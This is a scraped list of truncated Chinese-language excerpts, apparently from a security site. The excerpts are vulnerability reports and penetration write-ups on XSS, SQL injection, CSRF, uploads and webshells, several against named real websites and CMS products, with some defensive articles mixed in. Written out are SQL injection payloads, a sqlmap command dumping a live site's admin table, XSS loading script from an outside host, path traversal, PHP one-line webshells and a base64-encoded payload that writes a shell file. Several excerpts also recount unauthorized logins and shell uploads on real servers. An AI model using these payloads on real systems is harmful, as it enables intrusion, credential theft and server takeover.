国外某童鞋收集整理的针对HTML5的 XSS测试代码 video source onerror=javascript:alert(1) 引入媒体类测试代码Example: video onerror=javascript:alert(1)source...
爱丽网传照片时有个创建相册的功能 相册名称没有做特殊字符过滤 如下图: 名称在客户端做了长度限制,但是服务端没做 截获请求如下:...
存在问题的站点为畅途网-3G炫彩版-QQ手机浏览器合作版! 域名:qq3g.trip8080.com 1.点击忘记密码; 2.输入需要找回的用户名; 3.畅图网在注册...
PHP是目前互联网环境中最主流的动态网站开发脚本语言之一,使用PHP开发的Web应用程序的安全性也是黑客喜欢关注的焦点。本文将通过源码...
多处 CSRF,能修改的内容很多 1. 修改收货地址,帐户中只有一个收货地址时,很多人付款时不注意收货地址,直接付款 script src= http://mmme....
一、在个人信息中修改头像 二、抓包修改 三、插入成功 四、随便找本书进行评论 五、浏览该网页,就会被弹窗 修复方案: 过滤Avatar...
Struts是Apache基金会Jakarta项目组的一个开源项目,Struts通过采用JavaServlet/JSP技术,实现了基于JavaEEWeb应用的Model-View-Controller(MVC)设计模式的...
假设的目标网站 http://www.2cto.com /info.php?articleid=123(实际不可注入) 当articleid 变量取值为123 时,我们假设一下在服务器中会有怎样的代码运...
低版本的sqmail有几个xss洞...但是没有exploit...这次通过实例补充一下 求不要跨省...我还要读几年书呢 香港科技大学喜欢使用squirrel mail作为...
www.2cto.com:dz的新版安装插件需要安全码,恐怕这个比较难获取 具体哪些版本存在漏洞,自己测试,只要能安装这个插件的,就能拿到shel...
韩文看得稍蛋疼,不知道是何建站系统。 target:http://www.krbelongstoprc.kr 伪静态注射点: exp: /**//*!30000and(select/**/1/**/from(select/**/count(*),conc...
http://yangfanbook.sina.com.cn 登陆以后上传头像那 抓包改包上传成功 修复方案: 见站内文章...
如家官网-如家互动 论坛分享建议版块,发表新帖或者评论,没有对提交的特殊字符进行转码,导致XSS,可用来偷cookie钓鱼等。。。 url:h...
1:代码分析 about/index.php $filpy = basename(dirname(__FILE__)); $fmodule=1; require_once ../include/module.php; require_once $module; 结合metinfo的全局变量覆盖机制 可...
缺陷文件: \core\api\payment\2.0\api_b2b_2_0_payment_cfg.php core\api\payment\1.0\api_b2b_2_0_payment_cfg.php 第44行 $data[columns] 未做过滤导致注入 !--?php /p--set_t...
(一): http://www.0day5.com/phpcmsv9/index.php?m=memberc=membera=deletepc_hash=GlyB7Gid post userid=(select * from (select * from(select name_const(@@version,0))a join (select nam...
先看文件sms.php 可以看到没做过滤 ------------------------------------ 利用方法如下 1. http://demo.easethink.com/sms.php?act=subscribe 首先获得验证码! 将其...
扫了一下就发现了编辑器的问题,然后弱口令居然登陆上去了,神马都不说了,弱口令啊 传马 然后看一下服务器信息 还顺便猜了一下OA的地...
利用命令注入写一句话php webshell到web目录涉及到一些特殊字符的转义,假设需要写入?php eval($_POST[pandas]); ?,方法如下: WINDOWS:用^转义,即...
饭统网提交订单处发现漏洞可盗取管理员以及商家的cookie 如果我种下的是木马,危险可以知道的。(什么过滤都没做...
(一)临时文件简介 临时文件,顾名思义是临时的文件,文件的生命周期短。 然而,很多应用的运行都离不开临时文件,临时文件在我们电...
事件过程 2012年10月19日上午,同事在日常巡检时发现一套对外服务的电子商务系统后台Oracle数据库中出现了一个名为zwell的用户,并且,该用...
你正在为网站无时无刻地被人扫面而烦恼?个人网站没有企业级防火墙是不是就束手无策呢?如果你用的是nginx,那么恭喜你,nginx配置文件...
漏洞地址 http://event.youku.com/siemens-home/openthekitchen2013/save.php?action=videourlid=1 id未过滤导致注入 专题站 不过还发现一个 test 裤。。数据量很可观...
0x00 前言 目前主流的CMS系统当中都会内置一些防注入的程序,例如Discuz、dedeCMS等,本篇主要介绍绕过方法。 0x01 Discuz x2.0防注入 防注入原理...
用友分站SQL注入漏洞,可登录后台 附送反射性XSS一枚 http://aud.yonyou.com/php/search.php?keyword=page=19tag=1total_record=943typeid=1typeid和page参数存在注入...
struts2重大安全漏洞出在了ONGL表达式上面,通过在URL中拼接java代码的方式完成攻击。 光从这个漏洞的表现上看,struts2实现了一个动态拼接...
admin/integrate.php文件,110行 $code = empty($_GET[code]) ? : trim($_GET[code]); if (empty($code) || file_exists(ROOT_PATH . DATA_DIR . /integrate_ . $code . _log.php )) { sys_m...
之前winwin已经发过这个漏洞的分析文章,分析的很到位,不过有几个点有些问题,所以我在这里把自己的分析内容发出来,供各位参考。 这...
输入去哪儿账号后,可以看到密保邮箱,毫无隐藏,极度不安全。 1.点击找回密码 2.可以看到有手机或者邮箱 随便点 F12 都可以看到滴=-= ...
最近渗透一个X站,环境是主站+论坛,没有其他的程序可以利用。 进入主站的后台后,反复研究没有可用拿shell的地方。 只有拿论坛了。 扫...
1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一...
0x00 简介 JBoss应用服务器(JBoss AS)是一个被广泛使用的开源Java应用服务器。 它是JBoss企业中间件(JEMS)的一部分,并且经常在大型企业中...
变量的传递过程是$_SERVER[QUERY_STRING]-$urlcode-$output-$value-$db_where-$sql-mysql_query,整个过程无过滤导致了注入的发生。 正因为变量是从$_SERVER[QU...
本文介绍的是W3C的Content Security Policy,简称CSP。顾名思义,这个规范与内容安全有关,主要是用来定义页面可以加载哪些资源,减少XSS的发生...
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小 群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx 发表文章那边有个附件上传...
昨天用闲来无事用手机浏览博客,打开后发现竟然是个Webshell页面,密码还是默认的amdin,果断上电脑上查看,却是可以正常打开博客,经检...
Discuz可以算是php里的一个比较优秀的bbs程序了,最近公司了增了discuz应用。不过在服务器上运行php程序相较java程序来说,安全性上总觉得不...
If you carefully encode a web shell in an image you can bypass server-side filters and seemingly make shells materialize out of nowhere(and Im not talking about encoding data in com...
在 Django 的表单中硬性添加 {% csrf_token %} 标记如下,否则在提交表单的时候会出错,目的就是为了防止 CSRF 攻击: form action=/summit_question me...
SDCMS后台绕过直接进入:测试版本2.0 beta2 其他版本未测试 Islogin //判断登录的方法sub islogin()if sdcms.strlen(adminid)=0 or sdcms.strlen(adminname)=0 then ...
之前有人发布了 利用PNG 图片上述压缩函数的方法 原理利用 PNG的结构IDAT chunks填充一句话webshell,并进行一套取模运算 详见: http://www.2cto...
默认后台 /www/index.php?mod=admincon=indexact=login 2003系统getshell /www/index.php?mod=admincon=onepageact=addpost post onepage%5Bname%5D=phpxonepage%5Bfilename%5D=php.php;on...
下面是摘自thinkphp官方的一个公告,官方直接贴出这些东西是非常不负责的行为,跟上次apache公开的Struts2的代码执行一样的行为,会造成很...
和wap模块下的SQL注入原理一样,都是从$_SERVER[QUERY_STRING]中去取变量导致绕过过滤的情况。 在/interface/search.php文件的in_result函数中: function ...
下载页面 http://neclub.netgear.com.cn/nebs/downloads.asp?PageIndex=100ID=20 ID过滤不严导致sql注入 (话说虽然用的是asp,数据库居然配的是sql server 2008的。...
今天无意中看到这个源码,顺手看了下,你说这么烂的源码你还加密搞域名验证,搞验证你就搞验证还放后门,这是多么素质啊,下面简单...
今天,登陆拉手时候发现我把自己的用户名忘了... 然后就随手检测了一下... 我就拿自己的号码做测试吧... 登陆时候,点忘记密码,来到密...
涂鸦王国找回密码的链接为弱随机数,可被枚举出来导致账号密码被重置。我连续发送了五封找回密码的邮件,在绑定的邮箱里查看找回密...
分析 只需要获取到 /api/uc.php?time=xxxcode 即可 嗅探数据结合一下,访问页面会显示空白 其实这个时候已经是登陆成功. 到用户面板修改管理员密...
没想到玩手机都能发现一个鸡肋漏洞 学校补课,可以买饮料,买了一瓶康师傅冰红茶,上面写着可以发13位码到xxxx号码看是否中奖。于是就...
CSRF 背景与介绍 CSRF(Cross Site Request Forgery, 跨站域请求伪造)是一种网络的攻击方式,它在 2007 年曾被列为互联网 20 大安全隐患之一。其他...
现在有不少网站的确不安全,于是,当我们浏览某些不熟悉的网站的时候,心里难免会有些担心,这也就使得我们有必要掌握一些检测网站...
http://upload.ccidnet.com/cases/admin/login.jsp 第一个分站弱口令 test test 有上传页面 直接上传 http://goldpen.ccidnet.com/goldpen/admin/ 弱口令 ccidnet ccidnet f...
一、原理说明 1、我这里说的HTML注入并不是什么伪静态注入,而是通过向浏览器插入额外的字段代码,混入其他的登陆表单中,从而让用户...
你还能够使用aspnet_regiis.exe命令行工具来加密和解密Web.config文件配置部分,你可以在%WINDOWSDIR%\Microsoft.Net\Framework\version目录下找到这个工具。...
腾讯微博的HK站点:http://t.hk.qq.com/ 1.发现这个站点数据会和t.qq.com站点同步,添加一个收听是GET请求,哈哈,so直接构造下面的请求; http:...
未进行权限检查导致可以删除任意pms表内容 详细说明:文件 modules/ajax/pm.mod.php 行146 function delOutboxMsg(){$pmid = (int) $this-Get[pmid];if($pmid 1){retu...
有个朋友服务器遭受攻击,目前可以断定是CC攻击,所以提供个PHP防CC攻击代码。说的有点过分了,其实也就是防止快速刷新代码,对于那么...
再来一个未授权的任意删除。。估计还有我就不给你们找了,举一反三你们自己找去...
细节决定一切!老规矩~ 主要内容放证明里面! 渗透的成功与否我个人认为还是看细节! 0x001 扫描 经过扫描!锁定了http://goldpen.ccidnet.com这...
0x1 会员中心添加缺货登记处linkman参数在后台查看详细时未做编码,导致跨站.. 0x2 ecshop 后台integrate.php文件 从第80行起基本都是文件包含.. 可...
今天帮人看一个站点时发现这个上传文件的脚本,发出来过程给大家共享下。 看图: 这里跟踪到页面头部调用的..AienUpload/init.js 脚本,然后...
问题还是出现在密码找回页面,验证码无限制可爆破... 登陆时,忘记密码来到密码找回页面... http://sso.hc360.com/VerifyLoginName.html 输入目标用户...
首先我们来到pplms.cn/v/admin 进入后台登陆页面 帐号密码admin admin888 认证码8888 都是默认的 进去来到 然后点击 界面管理 中的 网站模版管理...
1.第一个用户的个人信息如下; 2.修改另一个用户的各项个人信息; 3.点击提交并抓包,得到如下信息; info=userid%3D884466%26old_name%3Dmajiage%2...
www.2cto.com:程序猿提出了挑战,黑客们,来试一下? 单位认为这个项目中这两个代码很牛,可以防止一切代码类的攻击,在此发布出来。求...
主要两处问题: 一、前台创建词条时插入内容只是editor的js对敏感code做了客户端过滤,传入服务器后服务器端过滤不够严格,构成Xss。 二、...
物品数未做约束导致支付漏洞 1、随便购买3部手机,1399x1pc、999x1pc、399x1pc 2、将999和399手机的购买数量修改为-1,使其的和等于1元 ----修改数...
只是写写思路觉得蛮好玩的,盲打也能干点正事不是。。。 说点题外话,很奇怪盲打成功后准备修改拿到的COOKIES,好多修改COOKIES的工具和...
0001 最简单的就是改变大小写 在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则 比如:scriptalert(xss);/script 可以转换为: ScRiptA...
刚好打开这个站,发现第一次点击会弹窗,然后就不会,清除下COOKIE,又继续了,然后查看源代码,也没什么奇葩的。 http://www.lxting.com/sc...
基于时间差的sql盲注. http://wowdb.tgbus.com/zones.aspx?c=6(参数c未过滤) http://wowdb.tgbus.com//npcs.aspx?aid=cid=3(cid未过滤) 第二个下面的那个之前别人提过...
1.搜狗地图有标注功能,在名称和说明里面写入代码 2.保存后 3.分享地图,复制链接 打开连接,代码执行。 因为搜狗地图具有很高pv,且漏...
安装网站程序,首先修改默认的数据库文件名或路径,这是网站安全的第一注意事项,那么该如何更改数据库文件名及路径,保证网站程序...
这个漏洞是我们在进行非授权安全评估时候发现的。是一个ecshop的站,通过以往的0day爆出了管理员密码,无奈解不开。。。于是就想,有没...
一:goods_attr_id的二次注入 注入利用过程: 1.添加商品到购物车时,写入注入代码到商品属性id http://localhost/test/ecshop/flow.php?step=add_to_cart P...
web.config的文件多数的时候不希望别人看到,下面提供一个加密,解密的语句,简洁方便实用,先看到效果,至于加密的原理其他的网页上做...
0x00 SVN介绍 Subversion,简称SVN,是一个开放源代码的版本控制系统,相对于的RCS、CVS,采用了分支管理系统,它的设计目标就是取代CVS。互联...
科创CMS任意上传JSP可执行脚本文件漏洞,波及一大批网站。 科创CMS上传0day存在位置 /creatorcms/comm_front/email/uploadImageFile_do.jsp /comm_front/email/...
1.某站弱口令+任意上传致shell 地址位于:http://fota.suning.com 弱口令:Admin:Administrator 任意上传漏洞位于修改版本和升级包查询页 上传后得Sh...
后台大规模的存在 order by 注入 搜索了一下 $_REQUEST[sort_by] 或者$_REQUEST[sort_order] 大约涉及到30多个文件。。。 我的天。30多处!!ec的开发人...
某大牛遇到个搜索型的注入,工具不好跑,于是相约一起手工,但我是菜逼,在查阅了文献并且经过疯子大牛的悉心提点下,便写下这篇笔...
wscript.shell 和 shell.application 这两个组件都是来执行程序的,因此是最不安全的组件。目前很多asp木马执行命令都是用的 wscript.shell ,忽略了...
http://121.14.4.245:81/ 这个是中企动力的一个什么业务我也不清楚,但是这里 http://121.14.4.245:81/upload.do?method=uploadDcpdomainStr={域名}pwd={与域名有关...
我们都知道,只要合理正确使用PDO,可以基本上防止SQL注入的产生,本文主要回答以下两个问题: 为什么要使用PDO而不是mysql_connect? 为何...
中华网博客存在严重XSS现象,打到了西班牙去..随时可能被国外hack盯上 博客XSS还是很可怕的 而且中华网博客首页还有一个推荐功能 推上首...
起因,许诺说他的网站被人黑了,大半夜的叫我来分析下搞个exp给他,官方已经出了补丁,网上还没有exp。对比了下补丁漏洞出现在datacal...
这篇文章虽然是2008年写的,比较旧,但是问题讲的通俗易懂,一看就明白那种,感觉不错,就翻译出来了。 有这样的一个想当普遍的场景就...
首先发一个YY信息 给网友,这个是测试的 没有进行诱导 然后打开 cookie来了 用老兵试一下 登陆进去了 修复方案: 过滤...
class WindMysqlPdoAdapter extends AbstractWindPdoAdapter {/* (non-PHPdoc)* @see AbstractWindPdoAdapter::setCharset()*/public function setCharset($charset) {$charset $this-query(set ...
1.客户端验证绕过 很简单啦,直接使用webscarab或者burp修改一下后缀名就行。 2.服务端验证绕过-Content-type检测 若服务端检测文件类型时是检...
存储xss,已经x到几个用户。 详细说明:问题发生在 http://tuya.games.sina.com.cn/graffito_detail.php?wid=37519 昵称未过滤。 提交后直接查看不会触发。...
我在测试这个分站的时候,发现网站的favicon.ico是Discuz的默认图标,就猜测肯定和Discuz有关系了,结果真是,测出来默认安装文件未删除。...
虽然早就知道有这种工具,但是一试之后才发现确实太过凶残。 我想了一下,对于这种蛮不讲理的方式貌似是没有完美的解决办法。这东西...
一个功能点的SQL注入和存储XSS,内含多种技巧,我觉得我就是个艺术家~~ 刚下的ecshop V2.7.3版本~ 1.漏洞存在于站外广告统计功能(对应管...
./subscribe.php这个页面存在问题 其中除了$_REQUEST[act]==mail选项未添加页面发送信息外,其余选项都拼接了用户发送信息。 属于post表单信息。...
易想团购系统link.php页面内代码 if($_REQUEST[act]==go) //link标签 go{ $url = ($_REQUEST[url]); //直接取了url的值就带入了sql查询语句了 $link_item = $GLOBAL...
官网提交订单总是失败,所以只能本地测试 漏洞代码位置 module\index\order.php 行 73 $_p_info[order_productmoney] = $money[order_productmoney];$_p_info[order_w...
逻辑错误。外加N个 XSS跨站 http://bbs.jeecms.com 登陆了以后有一个积分。在积分兑换的时候。出现了逻辑错误。我没太仔细看代码。应为你们论...
http://others.sports.sina.com.cn/cva/paper.php?id=264 存在注入 root@kali:~# sqlmap -u http://others.sports.sina.com.cn/cva/paper.php?id=264 --dump -C Manager,PassWord -T cva_man...
Espcms V5.6.13.04.22 UTF8 正式版某文件存在注入漏洞,可获取管理员帐号和密码 漏洞文件:\interface\membermain.php $zipcode = trim($this-fun-accept(zipcode,...
Author:H3art Data:Aug 9,2013 地址:http://i.sohu.com/login/logon.do?bru= 未对bru的输入进行过滤...
和qq一样,yy的账户有昵称和签名。 qq客户端的和qq的web无缝连接,所以 这样的代码,在客户端里不会出现bug,但是直接出现在web就可以来...
华联超市股份有限公司是中国国内第一家上市的连锁超市公司,其前身为成立于1993年1月的上海华联超市公司。 本漏洞出现在华联超市供应...
可注入出数据库。。。。 1、首先注入URL为:http://it365.yesky.com/cseek.productList.do?userid=295484qq-pf-to=pcqq.c2c 在这左下有个输入框,我们输入一个字...
新浪对某些应用带有自动授权行为。第三方应用不严谨导致漏洞存在(这个应用貌似也是新浪官方的)。主要是Referer判断不严谨。可以导致...
修复方案: 加强权限认证。删除有同样问题,不再证明...
1.使用汽车之家的找回密码功能找回密码; 2.汽车之家的密码找回功能相当强大,支持用户名、手机号、邮箱找回,本人对美女主播甚是中意...
官方演示系统 URL = http://t9.go2oa.com 利用试用账户登录进去 在控制面板- 昵称与头像 - 上传 可上传任意文件。 上传SELL -- url = http://t9.go2oa.co...
该程序采用枫叶通用防注入1.0asp版,此防注入完全鸡肋,该类型网站程序pro_show.asp 有cookies注入或者变型注入,注入前可以先判断一下字段数...
代码审核 文件 plugins\phpdisk_client\passport.php $str = $_SERVER[QUERY_STRING]; if($str){ parse_str(base64_decode($str));// 触发函数 }else{ exit(Error Param); } /*$userna...
本来是一处非XSS点,但使用有点奇葩的方式就绕过了。 1. 首先是普通情况下: http://soso.music.qq.com/fcgi-bin/cgiSearchKeyWord?w=aaascript 显然, 和 都...
某处对输出过滤不严谨导致存储型XSS 问题出现在新浪微博的搜索页面:找人模块。昵称 搜索一个123 下方有一个搜索历史,这块区域并没有...
在果views.asp这个文件有问题,存在注入 可以看到:hw_id=Request(hw_id) hw_id没有任何过滤,还是request请求,一看就鬼火,以前的老漏洞难道在新...
# 标题: Open Real Estate CMS - Multiple vilnerabilities# 发现者: Yashar shahinzadeh# 程序官网: http://monoray.net/products/6-open-real-estate# 测试平台: Linux Windows, ...
贴图神器上传存在XSS漏洞 1.先构造代码: img class=BDE_Smiley src=http://www.68idc.cn/help/uploads/allimg/150905/0Q6346002-0.png pic_ext=png width=30 height=30 onload=al...
mall.autohome.com.cn可任意修改、删除用户的信息,如个人收货信息; 1.使用两个用户分别添加一条收货信息如下(可根据浏览器区分); 2.获取...
Espcms V5.6.13.04.22 UTF8 正式版某文件存在注入漏洞,可获取管理员帐号和密码 在文件\interface\enquiry.php: function in_enquirysave() { parent::start_pagetem...
另类利用Espcms的加解密函数,绕过后台所有模块的权限验证 额。。。解释起来比较长,算是一种思路 后台权限验证的类文件:\public\class_...
百度知道没有对搜索结果中的提问内容做好过滤和编码,用户在查看结果时可能会被xss攻击。 百度知道的搜索结果要引用其他用户的提问与...
问题站点k.autohome.com.cn 1.注册两个用户,各发表一篇某车型的使用口碑帖子; 2.首先我们尝试在第二个用户登录的情况下,修改第一个用户的...
GET就能发微博啊!!!!!微博还通过抓包插入csrf图片啊!!!看到微博不用点击就会自动蠕虫啊!!!!! 详细说明:漏洞存在于微活动...
Author:左泪 E-mail:My0xsec@qq.com 手上没有Discuz! X2.5的0day,旁站甚少,希望不大,果断放弃,转战C段。 一番周折,发现有个站有Eweb编辑器,可...
1:通过 $alias 二次注入来控制sql 用户昵称 $alias 从数据库查询出来 未过滤 interface/member.php $db_sql = SELECT * FROM $db_table WHERE $db_where; $rsMember = $...
许多网站也存在同样的问题,hash算法过于简单,导致轻易就能被破解。 详细说明:首先重置下密码,收到了一封邮件,重置密码地址是:...
搜狐个人中心http://i.sohu.com也有发微博功能,和http://t.sohu.com是同步的,那么,就来抓抓包看看吧。 看到了吗,没有token有木有!!!!!...
# 标题: Tribq CMS CSRF - Adding/Editing new administrator account # 发现者: Yashar shahinzadeh# 开发商: http://sourceforge.net/projects/tribiq/# 测试平台: Linux Windows,...
1、通过floor报错 可以通过如下一些利用代码 andselect1from(selectcount(*),concat(version(),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a); and(selectcount...
--------------------------------------------Joomla! redSHOP component v1.2 SQL Injection--------------------------------------------== 概述 ==- 影响产品: Joomla! redSHOP compo...
影响程序: HMS Testimonials ( http://wordpress.org/plugins/hms-testimonials/ )影响版本: 2.0.10类型: Wordpress插件开发者: Jeff Kreitner ( http://profiles.wordpress.org/...
php168 V7.0 最新后台拿Shell方法 方法很简单利用后台的运行sql语句代码写一句话 PHpMyadmin写一句话 参考:http://www.2cto.com/Article/201210/164520.html...
皮皮精灵皮皮宠分站,多处来自客户端变量未进行安全过滤,导致存储型跨站存在,测试可蠕虫。 1 个人签名处未过滤 #2 蠕虫 AJAX POST http...
1. 下面这个搜索框存在注入。 2. 搜索框输入以下内容。 周杰伦 and 1=2 union select version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26...
# 标题: KCFinder Local File Disclosure# 作者: DaOne# 官网: http://kcfinder.sunhater.com/# 影响版本: 2.51 + old versions[#] Tested on their own demo-PoC-POST http:// www.2c...
简单闲的蛋疼,从官方网站上下载http://www.anquangou.cn/ IIS v3.0 安装 简单测试一下... 构造一个简单的注入页面asp+sqlserver 开始测试: 绕过: 原来...
过滤了,? 我绕! 过滤了() ? 我绕! 想用/**/注释下,竟然连*都过滤了... 我绕绕绕! 有问题的地址是:http://qzone-music.qq.com/fcg-bin/fcg_music...
修复方案: 删除书单有同样问题,不再证明,这算两个洞吧....加强权限认证吧...
000 前言 对于一个完善系统而言,无论是桌面还是web 程序, 都会使用客户端保存数据如cookie,db文件等。为了不让外部获取 或者控制,系统会对数...
过滤不严格可以用很多种方法绕过(写这过滤的一定是个天真的妹纸) 现在这里选我要求租 http://zu.soufun.com/rent/backstage/Delegate_Require/Delegate_P...
构造页面: http://dyp2p.com/?codep=addq=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././...
安全是一个整体,保证安全不在于强大的地方有多强大 而在于真正薄弱的地方在哪里--剑心 从很多的渗透大型企业内网的案例来看,入侵者...
构造最常用的密码来破解你的账号,海量爆破,你中枪了没 1:随意输入一账号,构造密码为 super8,点击登录: 2:抓包看请求: 3:对tb_...
CSRF(Cross-site request forgery跨站请求伪造,也被称成为one click attack或者session riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。 一、...
修改个人信息处未验证token,可通过一个精心构造的表单强制用户修改邮箱,达到劫持用户的目的,劫持用户账号只需要欺骗目标用户点击一...
关于管理员密码那些事。 本文前提 已经获得管理员密码的MD5! 不知道从那个版本开始ec管理员密码加密方式发生了一些变化 $ec_salt=rand(1,...
1、Discuz!X2版本 在插入视频处构造跨站语句 2、触发 3、Discuz!X2.5版本同样的方式触发 修复方案: 过滤...
后台可以编辑语言项,并且语言项中有部分是双引号,所以可以通过 {${phpinfo()}}这种格式直接执行php代码,getshell!!(这里为了方便演示,使用...
模板管理--语言项编辑 如:user.php 搜索:状态 插入${${fputs(fopen(base64_decode(ZnVjay5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbZnVja10pPz4))}} 访问http://local...
############# 标题: Macs CMS - Multiple vilnerabilities# 作者: Yashar shahinzadeh# 开发者网站: http://macs-framework.sourceforge.net/# 测试环境: Linux Windows, PHP 5.3....
000 安全狗之菜刀的突破 #原理: BAD: caidao - safedog -X- backdoor GOOD: caidao - middle - safedog - backdoor - middle - caidao 菜刀发送的数据是会被安全狗拦截...
近日,根据日志宝分析平台的分析数据显示,部分网站的访问日志中存在大量命令执行类后门行为。 我们与用户取得联系后拿到后门文件代...
小编发现近些年来zencart网站被跳转被黑之类的现象越来越频繁了,虽然zencart会更新漏洞,但是黑客总是有办法找到入侵的方法,被入侵后一...
PHPCMS某处由于没有对用户输入进行正确处理,导致存在存储型XSS漏洞。 漏洞成因:在发表文章时,没有对文章标题内容进行过滤,导致XSS漏...
1,先注册个用户测试,正常登录时点忘记密码,选择邮箱找回密码得到重置密码连接 http://www.kugou.com/newuc/user/resetpwd/code=EE0544XXXXX4CEBB2E41E5...
问题还是在找回密码哪里,弱爆了。https://www.mogujie.com/usersecurity/findpwd我们按找回密码。 用手机方式 用burp抓包。。。 抓那个错误验证码 蘑...
又是sql注入漏洞 测试版本:shopex-singel-4.8.5.78660 文件:\core\shop\controller\ctl.member.php function delTrackMsg() { if(!empty($_POST[deltrack])){ $oMsg = $this-sys...
修复方案: 加强权限认证...
快乐购xss盲打,用户登陆访问权限控制不严,绕过直接登陆。 一、xss劫持任意用户一 url:3g.happigo.com/yijian.php 在商品意见反馈出,反馈内容...
新发布的修复补丁引出该问题 http://www.phpwind.net/read/2993589 下载最新补丁代码PwUbbCode.php 添加了如下一个函数 if(strpos($path, javascript:)!==false...
360提交的漏洞,官方修复不严谨 http://bbs.webscan.360.cn/forum.php?mod=viewthreadtid=8613extra=page%3D1 修复前: 修复后(\core\api\shop_api.php): if ( isset(...
智器在线商店某处隐蔽的存储型XSS! 1月份的测试代码,今天才被触发... 这... 可能是因为没有实际购买的原因吧! 智器在线商店客户给商家...
当你在登陆学生管理系统的时候,添加的用户名若和你数据库中的数据不符时,就会弹出一个窗体,告诉你没有这个用户;但是当你在用户...
又是sql注入 测试版本:shopex-singel-4.8.5.78660 文件\core\shop\controller\ctl.tools.php function products(){ $objGoods = $this-system-loadModel(goods/products); $filter =...
后台弱权限sql注入一枚 PS:默认安装如果选择了安装测试数据就会多出2个帐号。本文再次从这两个帐号开始! 漏洞发生在 admin/affiliate_ck.ph...
dns找到速八的C段,找找重要的入口和管理系统,找到一个这个: http://myportal.super8.com.cn 这个貌似是登陆入口?搞下这个岂不是发大了? 随...
在文件\core\shop\controller\ctl.search.php function showCat(){ $objCat = $this-system-loadModel(goods/productCat); $this-pagedata[cat] = $objCat-get($_POST[cat_id]); $this-__tmpl...
无聊的sql注入 测试版本:shopex-singel-4.8.5.78660 在文件:\core\shop\controller\ctl.member.php function delOutBoxMsg() { if(!empty($_POST[deloutbox])){ $oMsg = $this-sys...
说明一下啊 我下载的最新版本 而且打上了最新的所有补丁! 你要再说是部分版本存在 我就要抓狂了啊! xss产生的位置 includes/init.php 206行...
快乐购大量用户敏感信息泄露,可批量获取 一、在忘记密码功能点,权限控制不严,存在大量用户敏感信息泄露 url:m.happigo.com/user/login.p...
一、url未加密,导致能看到任意用户真实手机号码 二、通过url可以在找回密码时换成任意手机号码找回 三、登陆进去后,可以修改任何人的...
可以在SDCM时代商城,任意金额购买任意物品。 1、首先进入商城,购买任意商品,提交商品数量时抓包。可以将商品数量改为负数,成功提...
回复的时候邮箱可以XSS 247 { 248 if (empty($_REQUEST[parent_id])) 249 { 250 $sql = INSERT INTO .$ecs-table(feedback). (msg_title, msg_time , user_id, user_name , . 251 user_...
这个漏洞在酷狗旗下的繁星网: fanxing.kugou.com 情景再现: 情况分析: 繁星网相册处因为对上传的文件名没有做很好的过滤,我们只要开启...
0x00 背景 关键时候长度不够怎么办? 在实际的情况中如果你不够长怎么办呢?看医生?吃药?做手术?。。。。。。。。。。。。。。算了...
一、 扯淡一段 我们做渗透测试,需要的是什么? 需要漏洞,漏洞是什么? 漏洞是可以利用来获取我们想要得到的东西的途径,技术或是非...
我图网 存储xss 指哪打哪,发现了有一段时间了,只是一直找不到突破的方法. 我觉得挺重要的,因为可以提现,你觉得呢 只测试几个大号,...
http://music.weibo.com 歌曲的歌评处过滤不严,只对script 标签,http 进行了过滤,可通过标签的事件属性进行绕过。 为演示xss 的危害,写了个...
############################################################ 标题: Wordpress ThinkIT plugin - CSRF / XSS# 发现者: Yashar shahinzadeh# 官网: http://thinkoverit.com/# 测试环境...
Ecshop作为互联网被广泛应用的网店系统,很多老板都会选择这一款优秀的网店开源系统。 尤其是很多淘宝卖家也都会选择用ecshop建站来展示...
coldfusion版本8后台登录时,只需要提交一个表单,就可以绕过用户名密码验证,登陆后台 这是登录页面 然后本地写一个表单提交页面 form ...
问题站点 http://sc.m.sohu.com No 1 平行权限修改任意用户收货地址 注册2个帐号 A帐号 UID=0c0525ac6b934bas B帐号 UID=672f91694a6a485s A帐号访问 http://sc....
首先进入买卖宝触屏版 http://12094.mmb.cn/wap/touch/home/index.jsp 然后选择找回密码,输入你要修改的帐号的手机号码,这里以13800138000为例。点击...
HTTP:超文本传输协议 (HyperText Transfer Protocol,) http是互联网上应用最为广泛的一种网络协议。设计HTTP最初的目的是为了提供一种发布和接...
On November 12, 2012, in Security Articles, Security Posts, by Soroush Dalili As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a...
跟我一起念后门口诀:挑、改、藏、隐来个例子先,例一: 只因为在目录里多瞅了一眼,只一眼,就认出了你。为什么你是那么的出众? 可...
文件 /interface/forummain.php中$userid未过滤进入sql语句 第17行到32行 function in_list() {parent::start_pagetemplate();parent::member_purview(0, $this-mlink[orderlist])...
后台修改模板处未过滤,可在模板中插入php代码(此处方便演示,使用了phpinfo) 本来,一个后台getshell的危害应该属于较低的,因为需要管理...
1、一般 1)lamp系统安全设置 2)php.ini安全设置 3)使用MVC框架 2、数据传输 1)在$_GET的$_POST,$_COOKIE,和$_REQUEST中,消毒和验证之前以编程方式操...
后台功能绕过,后台存在sql注入 结合绕过漏洞,进行sql注入 本地测试使用默认的adminsoft为后台目录,使用类的构造函数验证用户的后台访问...
一,一点XSS知识开头: 不用圆括号: onerror=alert;throw 1;onerror=eval;throw=alert\x281\x29; 二,表单中按钮覆盖form的action http://challenge.hackvertor.co.uk...
提问: 最近发现有大量的 IP 在刷我们网站的登录页面,是通过代理 + 模拟正常用户登录(包含 UA、session 等)的方式来验证用户名密码的有...
这里对PHP的代码审计和漏洞挖掘的思路做一下总结,都是个人观点,有不对的地方请多多指出。 PHP的漏洞有很大一部分是来自于程序员本身...
漏洞页面:http://www.codoon.com/app/host/CDN_JOURNAL 编辑日志:http://journal.codoon.com/html/show_edit/日志ID 删除日志:http://journal.codoon.com//html/del/日志I...
问题在繁简通这个业务,先申请一个繁简通的产品,网站地址直接填内网IP,就可以实现直接对内网的web进行访问,直接看图吧。 填内网IP:10.0...
------------------------------------------------------------Joomla! VirtueMart component = 2.0.22a - SQL Injection------------------------------------------------------------==概述...
